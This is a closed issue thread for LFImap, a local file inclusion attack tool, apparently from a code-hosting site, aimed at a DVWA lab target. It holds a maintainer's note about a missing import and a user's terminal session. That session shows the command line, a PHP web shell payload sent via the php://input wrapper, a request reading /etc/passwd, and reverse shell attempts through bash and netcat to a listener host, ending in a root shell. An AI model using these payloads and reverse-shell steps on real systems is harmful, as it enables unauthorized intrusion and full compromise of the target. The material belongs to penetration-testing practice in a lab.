Closed X-l-l-l closed 4 months ago
Found the fix too:
from src.attacks.pwn import pwn
is missing from src/httpreqs/requets.py
Thanks for raising this, I have reproduced the issue and provided a fix. Kindly 'git pull' and try again.
└─$ python3 lfimap.py -U "http://192.168.56.104/dvwa/vulnerabilities/fi/?page=include.php" -C "security=low; PHPSESSID=42d35a369ab7639b3e6bddae9b33d340" -i -v --lhost 192.168.56.116 --lport 3001 -x -v
[i] Testing GET 'page' parameter...
[i] Testing with input wrapper...
[+] RCE -> 'http://192.168.56.104/dvwa/vulnerabilities/fi/?page=php%3a%2f%2finput&cmd=cat%20%2Fetc%2Fpasswd' -> HTTP POST -> '<?php echo(shell_exec($_GET['cmd']));?>'
[?] Checking if bash is available on the target system...
[*] Starting reverse listener on 0.0.0.0:3001
[.] Trying to pop reverse shell to 192.168.56.116:3001 using bash via input wrapper...
[?] Checking if netcat is available on the target system...
[.] Trying to pop reverse shell to 192.168.56.116:3001 using nc via input wrapper...
[*] Connection received from ('192.168.56.104', 42587)
[*] Press enter to spawn the shell. Type 'back' to continue or 'quit' to terminate LFImap.
sh: no job control in this shell
sh-3.2# ls
help
include.php
index.php
source
sh-3.2# whoami
root
Tried to initiate a reverse shell and this is the output i get: